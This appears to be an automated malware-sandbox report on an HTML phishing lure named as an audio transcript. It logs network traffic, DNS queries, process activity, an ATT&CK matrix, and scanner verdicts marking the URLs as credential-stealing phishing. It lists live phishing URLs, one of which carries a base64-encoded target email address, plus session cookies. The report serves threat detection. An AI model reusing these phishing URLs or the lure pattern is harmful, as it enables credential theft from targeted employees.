Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe6b271e95a19cb&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/7vyul/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/7vyul/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe6b271e95a19cb&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: brh5.bughtswo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://brh5.bughtswo.com/tgs0/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjFLd2JQN09KbXFub0ZsYkZJcnBSYlE9PSIsInZhbHVlIjoiamNwVjNoNVRIU1RVbmxoZDJ2OEl2RlNuSldibmJKZWhFRFRQWmpCU2w3bEY3NndFaFZjYlZkZXZEYW1WY2o1aEpjb1IyV2RyS0x6c1phY2RweXY2VnRxT2R4RENRMEU1TjFDZ1ZZU3RQRGkxcmN1M2pwL2xwK1VLZ2MwV2FBUzkiLCJtYWMiOiIyNjBkZjFkY2ZkNzdkYmFmMzBhMzk4M2E5YzA2MGJjYTBhZTEyNzFlZmUzZDk5YzYwYWY1N2ZiM2VmYTNlYzE2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlF2VFZvbWZUQWFUcWhqN1JpNlloS3c9PSIsInZhbHVlIjoicnBPVmtmSHdSNUhZRk02Q29IVnRmR2h2VmdPSVpwcnZGbWZQODd2dVZNcWhkTGI5dWg5a2ZRQk51OGpvU3VRRlY4R2VHRTUrb0VaNnFBaWtnUEdCVUw1OGVnamFqV0VXanBJRGJYVzI4WEU1aFFCWHFNcitMbitRTG5FK2ZQdzIiLCJtYWMiOiI1MmUwMWRkMzUxODhjYTM4ZWMxNDUxZDA1NzUxMzZiMjVmZjBiNjQxYzU5ZmY4YWJiZTdhODI3NmY4MTM4MTJiIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1660689700:1736278100:0ZQQSFYZPedfX4O_ZYTMwMWkRQdIEiHqnm_WVkeJqJc/8fe6b271e95a19cb/b1kyRIitPK7rAruZNHAEw1s0NrT3tJg6Z9P4eP.Z10E-1736281735-1.1.1.1-P2cVOniWS7c.B83YFhJ3BYHkTauv6gJpPKSU9cTM8LlbLUtTtzE5a_PbshBTYIpL HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fe6b271e95a19cb/1736281737628/GROo7OGaIxf9AFr HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/7vyul/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fe6b271e95a19cb/1736281737628/GROo7OGaIxf9AFr HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8fe6b271e95a19cb/1736281737635/e234ea1a2e5430358f39da8ac16e3e4488ad77ca8eba26846c92181526c2edd2/0bF9m1t3aVUBprf HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/7vyul/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1660689700:1736278100:0ZQQSFYZPedfX4O_ZYTMwMWkRQdIEiHqnm_WVkeJqJc/8fe6b271e95a19cb/b1kyRIitPK7rAruZNHAEw1s0NrT3tJg6Z9P4eP.Z10E-1736281735-1.1.1.1-P2cVOniWS7c.B83YFhJ3BYHkTauv6gJpPKSU9cTM8LlbLUtTtzE5a_PbshBTYIpL HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1660689700:1736278100:0ZQQSFYZPedfX4O_ZYTMwMWkRQdIEiHqnm_WVkeJqJc/8fe6b271e95a19cb/b1kyRIitPK7rAruZNHAEw1s0NrT3tJg6Z9P4eP.Z10E-1736281735-1.1.1.1-P2cVOniWS7c.B83YFhJ3BYHkTauv6gJpPKSU9cTM8LlbLUtTtzE5a_PbshBTYIpL HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /YULERXbYBwUsYhyGuZXUZcAVbsVxoYXKQBUFUBSAVTBCBNBCRLRNESWSNFB HTTP/1.1Host: thmkl2jbjniwvjhtsmk1q8sogxlzypjlbn9ptrvqdhbav932njvufzrobyfk.expritraw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://brh5.bughtswo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://brh5.bughtswo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /YULERXbYBwUsYhyGuZXUZcAVbsVxoYXKQBUFUBSAVTBCBNBCRLRNESWSNFB HTTP/1.1Host: thmkl2jbjniwvjhtsmk1q8sogxlzypjlbn9ptrvqdhbav932njvufzrobyfk.expritraw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: brh5.bughtswo.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: thmkl2jbjniwvjhtsmk1q8sogxlzypjlbn9ptrvqdhbav932njvufzrobyfk.expritraw.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1660689700:1736278100:0ZQQSFYZPedfX4O_ZYTMwMWkRQdIEiHqnm_WVkeJqJc/8fe6b271e95a19cb/b1kyRIitPK7rAruZNHAEw1s0NrT3tJg6Z9P4eP.Z10E-1736281735-1.1.1.1-P2cVOniWS7c.B83YFhJ3BYHkTauv6gJpPKSU9cTM8LlbLUtTtzE5a_PbshBTYIpL HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3173sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: b1kyRIitPK7rAruZNHAEw1s0NrT3tJg6Z9P4eP.Z10E-1736281735-1.1.1.1-P2cVOniWS7c.B83YFhJ3BYHkTauv6gJpPKSU9cTM8LlbLUtTtzE5a_PbshBTYIpLsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/7vyul/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 20:28:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bhIT4pwb%2Fhz3uzY%2FX8QmdMbB22YUeA3v3xYWP%2F2S0pqLFrjc3hfi8qtmtxzGHPC1olWrunLgx8pfKqpY%2BUjACS0zDaMBtsDCilKZGc8UZ3pJd%2FI%2FSX0TCBzWcpDKYg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=74620&min_rtt=74601&rtt_var=28014&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2283&delivery_rate=38096&cwnd=32&unsent_bytes=0&cid=6c5b5273f656170c&ts=425&x=0"CF-Cache-Status: HITAge: 3418Server: cloudflareCF-RAY: 8fe6b27e3e1043c7-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1853&min_rtt=1837&rtt_var=700&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1896&delivery_rate=1589548&cwnd=215&unsent_bytes=0&cid=7f11eecf3ff66976&ts=135&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 20:28:58 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 2OHA2MBoHuMIkRCSwTA7X3faAaNF+1hBVsk=$yVjMVlBcy+xXcYNbServer: cloudflareCF-RAY: 8fe6b2820e2a7cf4-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 20:29:01 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: zk9Yi/vWnNtc/xzyB6PjPNY25AApisf2T/M=$1BVcANVfrfGZqz2AServer: cloudflareCF-RAY: 8fe6b295d86e7d24-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 20:29:07 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: GB+ulrt/KxtKg7ZyFPVkqwQeA1c/JQEXKxg=$n2h7QNcZjQCptsvkcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8fe6b2bc1db0c466-EWRalt-svc: h3=":443"; ma=86400
Source: audio.mp3_JasonhTranscript.htmlString found in binary or memory: https://bRH5.bughtswo.com/tgs0/#amFzb25oQHBhcmFkaWdtLWNvcnAuY29t
Source: chromecache_97.2.dr, chromecache_87.2.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_97.2.dr, chromecache_87.2.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: classification engineClassification label: mal68.phis.evad.winHTML@20/84@34/10
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\audio.mp3_JasonhTranscript.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1992,i,8920122697455249808,12015628893217446941,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1992,i,8920122697455249808,12015628893217446941,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: https://brh5.bughtswo.com/tgs0/#amFzb25oQHBhcmFkaWdtLWNvcnAuY29tHTTP Parser: https://brh5.bughtswo.com/tgs0/#amFzb25oQHBhcmFkaWdtLWNvcnAuY29t
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential Dumping1
System Information Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Rundll32
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://brh5.bughtswo.com/tgs0/#amFzb25oQHBhcmFkaWdtLWNvcnAuY29t100%SlashNextCredential Stealing type: Phishing & Social Engineering
https://brh5.bughtswo.com/tgs0/100%Avira URL Cloudphishing
https://brh5.bughtswo.com/favicon.ico100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
brh5.bughtswo.com
188.114.96.3
truetrue
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      code.jquery.com
      151.101.194.137
      truefalse
        high
        cdnjs.cloudflare.com
        104.17.24.14
        truefalse
          high
          s-part-0033.t-0009.t-msedge.net
          13.107.246.61
          truefalse
            high
            challenges.cloudflare.com
            104.18.95.41
            truefalse
              high
              s-part-0017.t-0009.t-msedge.net
              13.107.246.45
              truefalse
                high
                sni1gl.wpc.omegacdn.net
                152.199.21.175
                truefalse
                  high
                  www.google.com
